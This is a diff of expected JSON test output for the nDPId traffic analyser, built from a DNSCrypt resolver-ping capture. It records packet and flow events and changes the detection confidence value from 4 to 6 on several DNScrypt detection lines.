00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":372,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuogAub0RBHQKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAIcuopAAL0Rw14KAAABwb+7a7\/bAbsCCEABLykBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":946739318170,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318170,"pkt":"ZmZmZmZmRERERERECABFAADWEfMAADQRWDSOBM0vCgAAAQG7nMoAwrdpqlqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":946739318171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318171,"pkt":"ZmZmZmZmRERERERECABFAADWEfIAADQRWDWOBM0vCgAAAQG701AAwoDiqluBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} 
00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":946739318175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318175,"pkt":"ZmZmZmZmRERERERECABFAADWEfQAADQRWDOOBM0vCgAAAQG7jD8Awsf2qliBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} 
@@ -763,55 +763,55 @@ 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":946739318205,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739318205,"pkt":"ZmZmZmZmRERERERECABFAADSHklAADYR5+rBv7trCgAAAQG7v5AAvjUmLyiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAzGGkyIiowp8pFszsXxkEW0y0qS06At4miIE7AyLIdZ2u5Jf0Kd+gqa\/ZnKsGDqB9\/JqMQzB5mxntdDH0TQRsCBpBtMbo6VmIyWnkxOdJSeZWPK9K\/gWr4WDPFo1HWxdqGkG0xujpWYgAAAABX1Oe6F9U8Gg="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+LxAAL0RUngKAAABMw980LE\/EPcCCHK1aUUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+L0gAL0RbrcKAAABMw980MM3EPcGBKwyaUIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":385,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337048} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":385,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+L0Aub0Rk4oKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+L4gAL0RbrYKAAABMw980JWmEPcGBNnFaUABAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337048,"pkt":"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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":388,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337048} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":388,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+L4Aub0Rk4kKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 